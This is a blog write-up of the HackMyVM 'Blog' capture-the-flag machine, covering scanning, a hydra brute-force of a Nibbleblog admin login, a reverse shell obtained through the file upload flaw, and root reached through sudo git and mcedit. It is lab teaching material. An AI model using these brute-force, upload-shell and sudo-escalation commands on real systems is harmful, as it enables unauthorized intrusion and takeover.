NepCodeX

Learn. Spread. Learn.

security hackmyvm blog walkthrough write

Blog Writeup from HackMyVM – Walkthrough

Krishna UpadhyaySecurity, , , , , , , No Comments on Blog Writeup from HackMyVM – Walkthrough

“Blog” is an easy machine from HackMyVM by d4t4s3c. If you have done many machines, this is a piece of cake. If you are new, I definitely suggest you do it on your own. The enumeration starts with enumerating the directories and finding a special blog. It has a file upload vulnerability and one can execute a PHP script giving us a reverse shell. Then, we have to escalate to another user ‘admin’ using sudo permissions on git. Lastly, we have another binary ‘mcedit’ that gives us the root shell. “Blog Writeup from HackMyVM – Walkthrough”

Check out the link to the machine from here

Step 1: Get the IP address

Firstly, we have to identify the IP address of the target machine. I mostly use fping and netdiscover for this purpose.

❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.139

The IP address of the target is 10.0.0.139 and that of my Kali Linux machine is 10.0.0.4.

Step 2: Scan open ports

Next, we have to identify the open services on the target. Most of the time, it is the HTTP web server. Let’s check if there is anything other than it.

❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.139
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 21:30 +0545
Nmap scan report for blog.hmv (10.0.0.139)
Host is up (0.00082s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
|   256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
|_  256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As I said, there is only the HTTP server to enumerate further.

Step 3: Enumerate the webserver

On the HTTP server, we can see that it’s pinging the localhost. I checked if there is any GET parameters on the script that would allow us to command execution. However, I couldn’t do anything from the ‘index.php’ page. Thus, I performed directory enumeration using gobuster.

❯ gobuster dir -q -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.139 -x txt,html,php -o medium.log
/index.php            (Status: 200) [Size: 271]
/my_weblog            (Status: 200) [Size: 4317]

Here, we can find a new path ‘/my_weblog’ that further needs enumeration.

Step 4: Enumerating the blog

When we check the page source, we can find that it is a Nibbleblog.

<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Blog - Welcome to admin blog</title>
<meta name="description" content="Welcome to Nibbleblog">
<meta name="generator" content="Nibbleblog">
<!-- ------------ snip ------------------ -->
</html>

Upon checking the exploit for this CMS on the internet, I got to know it suffers from arbitrary file upload vulnerability. However, this requires authentication. I randomly checked the path /admin.php on the target. Fortunately, I found the admin login page.

To bruteforce, we require the input names. By looking at the source code of the admin page, we find out that they are “username” and “password”.

<form id="js_form" name="form" method="post">
  <div class="form_block"><input class="username" name="username" type="text" placeholder="Username" autocomplete="off" maxlength="254"></div>
  <div class="form_block"><input class="password" name="password" type="password" placeholder="Password" autocomplete="off" maxlength="254"></div>
  <div class="form_block"><input type="checkbox" id="js_remember" name="remember" class="float" value="1"><label class="for_checkbox remember" for="js_remember">Remember me</label><input type="submit" class="save" value="Login"></div>
</form>

Lastly, I performed the bruteforcing using hydra. For hydra bruteforcing, we need something that will recognize whether either the login attempt was successful or not. In this case, we can recognise the invalid login by the word “Incorrect” that we get after getting an unsuccessful login.

❯ hydra -l admin -P /home/kali/rockyou.txt 'http-post-form://10.0.0.139/my_weblog/admin.php:username=^USER^&password=^PASS^:Incorrect'

We get the password “k*****” for the user admin.

Step 5: Insecure file upload

For the reverse shell, I use revshells.com.

The vulnerability is that the admin can upload any file from “Plugins > Plugin :: My image”. We can find the uploaded script from the path “/content/private/plugins/my_image/image.php”.

Reference: https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html

I listen on port 9001.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

After listening, I uploaded the shell and visited the uploaded path to get the reverse shell. Next, I upgraded it to a proper shell.

Upgrade to an intelligent reverse shell

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.139.
Ncat: Connection from 10.0.0.139:43156.
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 17:20:49 up  2:18,  0 users,  load average: 0.00, 0.01, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@blog:/$ ^Z   
[1]  + 8086 suspended  nc -nlvp 9001
❯ stty raw -echo;fg
[1]  + 8086 continued  nc -nlvp 9001

www-data@blog:/$ export TERM=xterm
www-data@blog:/$ stty rows 30 cols 168
www-data@blog:/$

Step 6: Upgrade to the user ‘admin’

After we get the foothold, we can check the sudo permissions. There is the binary git that allows us access to the user ‘admin.

www-data@blog:/$ sudo -l
sudo: unable to resolve host blog: No address associated with hostname
Matching Defaults entries for www-data on blog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on blog:
    (admin) NOPASSWD: /usr/bin/git

From the gtfobins, I picked up a command that would give me a ‘less’ utility.

sudo -u admin git -p help config
!/bin/bash

Reference: https://gtfobins.github.io/gtfobins/git/#sudo

Step 7: Upgrade to the root user

After we get the admin user, we can see his sudo permissions too.

admin@blog:/$ sudo -l
sudo: unable to resolve host blog: No address associated with hostname
Matching Defaults entries for admin on blog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User admin may run the following commands on blog:
    (root) NOPASSWD: /usr/bin/mcedit

Upon opening the binary, we see an editor. On the File menu (Alt+F), there is a menu item, User menu… (F11). After this, we can choose “Invoke `shell'” (s). This gives us an sh shell. After this, we can open bash shell by typing “/bin/bash”.

admin@blog:/$ sudo mcedit
sudo: unable to resolve host blog: No address associated with hostname
#  /bin/sh /tmp/mc-root/mcusrR641H1
# bash
root@blog:/# echo nepcodex.com; md5sum /etc/shadow
nepcodex.com
f3587fe9c737ad77ab2ff8590e27ce17  /etc/shadow
root@blog:/#

In this way, we can get to the root shell.

Also read: DarkHole_2 Walkthrough – Vulnhub – Writeup

4.3 6 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Scroll to top

Send help to Morocco.

Donate!
X